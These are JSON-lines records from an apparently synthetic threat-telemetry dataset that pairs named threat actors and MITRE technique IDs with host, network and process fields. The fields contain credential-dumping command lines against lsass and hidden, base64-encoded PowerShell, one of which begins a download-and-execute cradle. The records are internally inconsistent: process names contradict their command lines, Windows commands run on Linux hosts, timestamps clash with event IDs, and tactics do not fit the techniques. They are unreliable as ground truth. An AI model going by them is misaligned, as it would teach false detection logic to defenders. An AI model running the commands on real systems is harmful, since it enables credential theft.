{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Initial Access","Exfiltration"],"technique_id":"T1546.003"},"event_id":"evt_mustangpanda_20260910T211928000Z_0015791","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.33.63.66","name":"DB-ORACLE-BVGOLW4L1I","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15791Mustang PandaT1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.170.196.254","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3028 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-10-19T05:30:53.000Z","user":{"name":"svc_xbalgorfp6jh","sid":"S-1-5-21-835124652-281391027-7095"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Collection","Defense Evasion","Reconnaissance"],"technique_id":"T1059.001"},"event_id":"evt_volttyphoon_20260208T155607000Z_0015793","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.234.103.169","name":"AZURE-VM-U16PTT61HG","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15793Volt TyphoonT1059.001"},"network":{"domain":"github.com","dst_ip":"1.94.247.153","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-03-15T12:04:16.000Z","user":{"name":"i-g2tncbtcqi6l","sid":"S-1-5-21-507200736-943442391-4504"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Defense Evasion"],"technique_id":"T1098.004"},"event_id":"evt_fin7_20251104T080533000Z_0015795","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.24.240.38","name":"WIN-FIN-SRV-T7H04JS710","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15795FIN7T1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.100.136.235","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3215 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-05-19T17:21:12.000Z","user":{"name":"CORP\\ilw7mdk1hycp","sid":"S-1-5-21-802953237-157624040-2997"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Execution"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20250118T055433000Z_0015797","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.201.95.151","name":"IAM-ROLE-XZ1LCJ16RC","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15797UNC4841T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.41.124.233","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1195 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-09-11T04:26:31.000Z","user":{"name":"azuread\\1gd2c7q70vgc","sid":"S-1-5-21-431396841-370536626-6395"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Impact","Execution"],"technique_id":"T1059.001"},"event_id":"evt_mustangpanda_20250710T035707000Z_0015799","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.173.132.239","name":"EC2-INST-R1VGQQNFH0","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15799Mustang PandaT1059.001"},"network":{"domain":"github.com","dst_ip":"1.74.44.243","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-02-21T00:38:58.000Z","user":{"name":"i-rxtd78yab4ja","sid":"S-1-5-21-591801330-154080601-5192"}} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.